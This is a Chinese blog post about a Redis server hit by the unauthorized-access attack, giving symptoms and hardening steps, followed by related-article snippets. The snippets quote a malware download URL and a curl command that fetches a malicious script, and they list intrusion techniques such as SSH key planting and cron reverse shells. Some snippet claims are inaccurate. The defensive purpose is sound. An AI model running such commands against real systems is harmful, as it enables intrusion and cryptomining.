redis 安全漏洞导致服务器被攻击

最新推荐文章于 2024-05-28 15:44:55 发布
最新推荐文章于 2024-05-28 15:44:55 发布
阅读量3.8k 收藏 2
点赞数 1
分类专栏: redis
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。

特点:
1.redis缓存被清0;而且每天会执行一次;
2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt,  authorized_keys里多了莫名的rsa字符串
3.redis-cli  检查,多了个key值crackit, value可能是rsa私钥自串或其它字串。

解决办法:
1.修改配置文件/etc/redis/redis.conf ,#bind 127.0.0.0 将这行注视去掉。由于我的服务器只本地访问,所以只改这一项就好,效果正在观察中。如果允许多台用户访问,建议设置访问密码; 配置rename-command 配置项 “RENAME_CONFIG”,增加远程控制难度;用非root用户启动redis-server;  
2.删除/root/.ssh/下所有无用的文件,另外所有私钥公钥建议删除,从新生成。因为很有可能被黑客写入了它们的钥匙,这样可以自由出入你的服务器
3.删除key值  crackit
4.查看 cat ./etc/passwd 清除多余的用户并且重置密码

http://www.secwk.com/article/info/detail/171175521112329340.html
http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
http://www.secpulse.com/archives/40406.html
golden_lion
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis安全漏洞
清扬叶
04-01 1002
Redis安全漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 ...
关于Redis未授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未...
请务必注意 Redis 安全配置,否则将导致轻松被入侵
多看多听多总结
12-16 4310
一、前言 前段时间,在做内网影响程度评估的时候写了扫描利用小脚本, 扫描后统计发现,内网中60%开放了redis6379端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的 考虑到本社区大部分开发者都会使用redis,特此分享下以便大家可以对自己公司的内网进行一个排查。 二、漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Red
Redis 基础:Redis 服务安全
qq_33240556的博客
04-25 123
Redis 服务安全涉及多个层面,从网络访问控制、身份验证、数据加密传输到运行时的安全策略等。综上所述,要保证 Redis 服务的安全,需要综合运用多种手段,从物理网络隔离到逻辑层面的权限控制和数据保护,形成一套完整的安全防护体系。
H2Miner变种,利用Redis漏洞入侵云服务器wa矿
热门推荐
China Honker 博客
01-12 114万+
H2Miner变种木马入侵后会下载挖矿木马,通过安装定时任务持久化,通过SSH复用连接进行横向移动感染。该程序由GO语言开发,通过还原后的函数名进行对比,可知其是H2Miner此前的kinsing文件变种,并且与http[:]//45.10.88.124/kinsing下载得到的文件一致。Redis 4.x/5.x 版本存在主从同步命令执行漏洞(CNVD-2019-21763),攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,该漏洞风险较高,且漏洞利用方式已被公开。
Redis安全漏洞影响及加固方法
qq_40770143的博客
10-12 1万+
Redis安全漏洞影响及加固方法 Redis安全漏洞影响: 1、 Redis因配置不当可以未授权访问,很容易被攻击者恶意利用。如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录、控制服务器,引发重要数据泄露或丢失,严重威胁用户业务和数据安全,风险极高,业界将此漏洞定位为高危漏洞。 2、 当前业界已暴出多起因Redis漏洞导致主机被入侵、业务中断、数据丢失...
redis未授权导致服务器被挖矿分析(20220119)
fr1d4st的博客
01-27 2708
文章目录@[toc]0x00 背景0x01 现象0x02 临时处理0x03 溯源 0x00 背景 20220119收到阿里云报警短信 【阿里云】尊敬的******:云盾云安全中心检测到您的服务器:xx.xx.xx.xx(**)出现了紧急安全事件:挖矿程序,建议您立即登录云安全中心控制台-安全告警处理http://a.aliyun.com/f1. 进行处理 。 登录阿里云控制台后发现有多条异常记录 恶意脚本代码执行(curl -s -L http://xx.xx.xx.xx/f220115rr/
Redis系列漏洞总结
NLost
10-21 6128
未授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
【实战记录】记录服务器遭到攻击全过程(Redis漏洞)
qq_41997592的博客
02-13 3409
第一次面对服务器攻击全过程,由被动到主动!!
谨防利用Redis未授权访问漏洞入侵服务器
weixin_42100387的博客
11-24 1633
谨防利用Redis未授权访问漏洞入侵服务器
Redis漏洞总结
白帽子佳奇的博客
05-28 773
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
redis权限webshell1
08-08
Redis 权限 webshell1 Redis 是一个开源的内存数据结构存储,用于database、缓存、消息队列等场景。然而,Redis 的默认安装配置存在一个严重的...通过这种方式,可以保护 Redis 服务器免受攻击,保障企业的数据安全。
redis-windows-x86-2.8.2104.zip
03-24
比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis...
大数据下的安全保护.pdf
10-14
例如,MongoDB和CouchDB都曾出现过默认配置不安全、身份验证机制薄弱的问题,导致数据容易被未授权访问。Redis则常常因为明文传输和默认开启的公开端口成为中间人攻击的目标。 2. **MongoDB安全问题**:MongoDB是...
计算机网络信息安全及安全防护10篇 (3).docx
11-16
此外,国家信息安全漏洞共享平台(CNVD)的报告表明,工控系统的漏洞问题严重,可能导致远程攻击和信息泄露。 计算机网络信息面临的主要安全威胁包括: 1. 自然因素:计算机设备对环境敏感,如水灾、火灾、温度和...
C#读取WinCC实时和归档数据
06-21
如何在 C#应用程序中读取 WinCC 变量归档数据,资源来自西门子官网
解放鼠标右键 chrome edge 浏览器 插件
最新发布
06-21
解放鼠标右键 chrome edge 浏览器 插件 开启开发者模式,拖入扩展管理即可使用
Python实战示例自动办公-20 Python文本数据可视化之“词云”图.zip
06-21
自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图
redis常用的漏洞利用方法
05-27
以下是一些常用的 Redis 漏洞利用方法: 1. 未授权访问漏洞:如果 Redis 未正确配置,攻击者可以轻易地访问和控制 Redis 服务器,从而获取敏感信息或造成破坏。 2. 注入漏洞:攻击者可以向 Redis 服务器发送恶意数据,利用注入漏洞,执行任意代码,从而控制服务器。 3. 缓冲区溢出漏洞:攻击者可以向 Redis 服务器发送恶意数据包,利用缓冲区溢出漏洞,执行任意代码,从而控制服务器。 4. 密码破解漏洞:如果 Redis 服务器的密码不够复杂或不够安全,攻击者可以利用字典攻击、暴力破解等方法破解密码,从而访问和控制 Redis 服务器。 5. 拒绝服务攻击漏洞:攻击者可以通过发送大量的恶意请求,或利用某些漏洞,让 Redis 服务器崩溃或无法响应,从而导致服务停止或数据丢失。 总之,为了保护 Redis 服务器的安全,需要加强对服务器的安全管理和监控,及时修补安全漏洞,提高人员的安全意识和技能。此外,建议使用更加安全的身份验证机制,例如 OAuth、LDAP 等,并且配置合适的访问控制策略,限制不必要的访问。同时,也可以考虑使用开源的 Redis 安全扫描工具,例如 Redis Security Check、Redis Sentinel 等,来加强对 Redis 服务器的安全检测和防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值